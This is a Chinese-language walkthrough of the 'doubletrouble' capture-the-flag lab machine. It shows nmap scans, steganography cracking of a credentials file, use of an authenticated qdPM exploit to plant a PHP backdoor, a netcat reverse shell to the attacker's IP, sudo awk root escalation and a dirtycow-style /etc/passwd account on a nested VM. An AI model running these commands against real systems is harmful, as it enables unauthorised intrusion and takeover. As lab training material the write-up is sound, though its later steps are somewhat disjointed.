doubletrouble wp&复盘
因为这台机子形式比较特殊,所以做个wpnmap
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap -sT -p- 192.168.48.67
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:17 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0058s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp openssh
80/tcp openhttp
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 20.37 seconds详细扫描
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap -sT -sC -sV -O -p22,80 192.168.48.67 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0019s latency).
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp openhttp Apache httpd 2.4.38 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.80 seconds脚本扫描
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nmap --script=vuln -p22,80 192.168.48.67 -oA nmapscan/vuln
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-10 23:18 EDT
Nmap scan report for 192.168.48.67
Host is up (0.0017s latency).
PORT STATE SERVICE
22/tcp openssh
80/tcp openhttp
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure:
|_Internal IP Leaked: 127.0.1.1
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum:
| /backups/: Backup folder w/ directory listing
| /robots.txt: Robots file
| /batch/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /core/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /install/: Potentially interesting folder
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /secret/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
| /template/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_/uploads/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:ED:71:B6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 38.25 seconds由于只开放了两个端口,先看80端口
看到这样一个页面
https://cdn.nlark.com/yuque/0/2025/png/48966044/1757561393003-fb31ddd0-c36d-470d-8583-b112003238f7.png
可以看到一个CMS,qdPM 9.1,大致看了一下,要么是需要身份认证要么比较难利用
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ searchsploit qdPM 9.1
---------------------------------------------------------------- ---------------------------------
Exploit Title |Path
---------------------------------------------------------------- ---------------------------------
qdPM 9.1 - 'cfg' Persistent Cross-Site Scripting| php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection | php/webapps/45767.txt
qdPM 9.1 - 'search' Cross-Site Scripting | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (Authenticated) | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2) | php/webapps/50944.py
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py
---------------------------------------------------------------- ---------------------------------
Shellcodes: No Results先看nmap的结果收集更多信息
有一个secret目录,可能藏有重要的线索
这里面有一个图片,下载下来
先看是否有嵌入文件
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ binwalk -e doubletrouble.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
WARNING: One or more files failed to extract: either no utility was found or it's unimplemented再看是否有隐写文件
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ steghide info doubletrouble.jpg
"doubletrouble.jpg":
format: jpeg
capacity: 4.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 看样子是有隐写的
我查看了其他的目录,均无信息
看来只有爆破了
这里可以用比较常见的stegcraker,
推荐用stegseek,爆破rockyou也只要几秒时间
瞬间得到密码
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
Found passphrase: "92camaro"
Original filename: "creds.txt".
Extracting to "doubletrouble.jpg.out".
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ ls
doubletrouble.jpgdoubletrouble.jpg.outnmapscan
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666 尝试登录80
进入后台
这个时候就可以尝试之前searchspolit的Authenticated RCE,50175要报错,尝试50944
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ python3 50944.py -url http://192.168.206.67/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.
The DateStamp is 2025-09-06 02:48
The DateStamp is 2025-09-16 01:41
Backdoor uploaded at - > http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=whoamihttps://cdn.nlark.com/yuque/0/2025/png/48966044/1758005009203-60d7034f-0241-41e1-b555-721a0a1e33cc.png
发现可以成功利用
尝试反弹shell拿到初始shell
http://192.168.206.67/uploads/users/895627-backdoor.php?cmd=nc%20192.168.206.200%201234%20-e%20/bin/bash拿到初始shell
┌──(kali㉿kali)-[~/replay/doubletr]
└─$ nc -lvnp 1234
listening on 1234 ...
connect to from (UNKNOWN) 33996
ls
584189-backdoor.php
807754-backdoor.php
895627-backdoor.php
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$ ls
ls
584189-backdoor.php807754-backdoor.php895627-backdoor.php
www-data@doubletrouble:/var/www/html/uploads/users$www-data@doubletrouble:/var/www/html/uploads/users$ sudo -l
sudo -l
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk允许以root身份无密码执行awk
在gtfobins上找awk
查得可以执行
sudo awk 'BEGIN {system("/bin/sh")}'www-data@doubletrouble:/var/www/html/uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
<uploads/users$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
doubletrouble.ova
# 这个脚本大概是可以把一个root的文件里面的内容随意替换,但是我试了一下,/etc/passwd里面的内容是可以修改,但是有格式不齐等问题
再试试dirtycow2
# passwd root
passwd root
New password: 123
Retype new password: 123
passwd: password updated successfully┌──(kali㉿kali)-[~/replay/doubletr]
└─$ scp root@192.168.206.67:/root/doubletrouble.ova .
The authenticity of host '192.168.206.67 (192.168.206.67)' can't be established.
ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:12:
~/.ssh/known_hosts:18:
Are you sure you want to continue connecting (yes/no/)? yes
Warning: Permanently added '192.168.206.67' (ED25519) to the list of known hosts.
root@192.168.206.67's password:
doubletrouble.ova ┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap -sT -p- 192.168.206.76 -oA nmapscan/ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:04 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp openssh
80/tcp openhttp
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 10.05 seconds这个脚本相当于创建了一个拥有root权限的用户,还给你留了恢复的备份
┌──(kali㉿kali)-[~/replay/doubletr/inner]
└─$ nmap -sT -sC -sV -O -p22,80 192.168.206.76 -oA nmapscan/details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-16 03:05 EDT
Nmap scan report for 192.168.206.76
Host is up (0.0013s latency).
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 6.0p1 Debian 4+deb7u4 (protocol 2.0)
| ssh-hostkey:
| 1024 e8:4f:84:fc:7a:20:37:8b:2b:f3:14:a9:54:9e:b7:0f (DSA)
| 2048 0c:10:50:f5:a2:d8:74:f1:94:c5:60:d7:1a:78:a4:e6 (RSA)
|_256 05:03:95:76:0c:7f:ac:db:b2:99:13:7e:9c:26:ca:d1 (ECDSA)
80/tcp openhttp Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
MAC Address: 08:00:27:2A:55:9E (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.84 seconds成功拿到root权限
对这个新建的用户,顺便学习一下/etc/passwd:
输出 firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash /sbin:/bin/sh
这是 /etc/passwd 文件中的一行,代表一个用户账户。在 Linux 中,每一行都用冒号 : 分隔成不同的字段,每个字段都有特定的含义。
正常的一行通常有 7 个字段,格式为:
用户名:密码:用户ID:组ID:描述:家目录:登录Shell
这一行:
[*]fiRbwOlRgkx7g: 密码。在现代 Linux 系统中,这个字段通常只是一个占位符 x,真正的加密密码存储在另一个文件 /etc/shadow 里,只有 root 用户能读取。这里直接出现了看似加密的字符串,这是一个巨大的安全风险。它表明系统可能使用了旧式的、不安全的密码存储方式,或者这个账户是被故意这样设置的,以便攻击者可以使用这个密码直接登录。
[*]0: 用户ID。这是用户的唯一数字标识。UID 为 0 的用户是 root 用户,拥有系统上的最高权限。这是一个极其危险的信号。
[*]0: 组ID。这是用户主要所属组的数字标识。GID 为 0 通常是 root 组,再次确认了这个账户拥有超级用户权限。
[*]pwned: 描述(也称为 GECOS 字段)。通常这里会写用户的全名或描述。这里的 “pwned” 是黑客术语,意思是“已被攻破”,这几乎明确宣告了该系统已经被入侵。
[*]/root: 家目录。这是用户登录后所在的初始工作目录。普通用户的家目录通常在 /home/ 下,而 /root 是 root 用户的家目录。这进一步证明该账户具有 root 权限。
[*]/bin/bash /sbin:/bin/sh: 登录Shell。这是用户登录后启动的命令行解释器。正常的格式应该只有一个 shell 路径(如 /bin/bash)。这里的 /bin/bash /sbin:/bin/sh 格式错误且混乱,看起来像是攻击者在匆忙添加账户时拼接了多个路径,但系统实际上只会尝试执行第一个部分 /bin/bash。
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]